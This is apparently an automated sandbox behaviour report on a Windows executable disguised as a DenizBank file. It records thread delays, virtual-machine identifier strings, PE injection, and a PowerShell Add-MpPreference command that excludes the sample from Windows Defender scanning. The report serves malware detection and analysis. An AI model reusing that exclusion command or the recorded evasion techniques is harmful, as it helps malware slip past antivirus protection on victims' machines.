Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f642e0dcb3ce0d
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fb18cb13cbb415
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802704510.000000000711D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1798401840.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f503d02294eb00
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fdc146993e4482<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f3b558df1e00f0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222458483.0000000006647000.00000004.00000020.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4214744246.00000000011E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fc0ff353526364<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fce88f3187a0bc<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8ff950ef5a466fb<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fe94ecb8a38815<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f7935aa30f4b9d
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f8b9e2cb6cde30
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f9f6d994425123

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Code function: 5_2_06A19548 LdrInitializeThunk,

5_2_06A19548

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Memory written: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"	Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqpM!
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0O
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPl
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$y
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPg
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0G
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0J
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0C
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,&"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0E
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPb
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0B
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqp{
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0p.
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq /)
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq04
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqps
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqpv
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPV
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@O$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdV(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0p
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtUB
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0k
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$y5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4X+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP\|
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0]
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPx
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPz
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqX>?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\|fA
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtP
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8@/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtD
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLi1
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqh`*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,(,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8a9
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,I6
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4Z
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0s
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP0$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq 13
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTO
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq42
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@Q.
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtq
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@r=
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtn
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTz0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTM
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtj
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@r8
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdY&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4Z5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq s@
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTA
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt^
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqD9+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,L
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLg
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,G
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLf
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLb
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqlx
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLW
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,9
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqlt
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqls
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLV
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhb4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8d"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqH!/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\J1
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqxA*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqp,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqHB9
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\|j,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP2.
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\k;
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@u!
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkql)'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqp)
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,m)
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<*6
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,b
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL\|
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqps3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,T
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0T@
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqd[0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqo3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@T,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLq
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPS8
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqd\|:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt:&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqpM
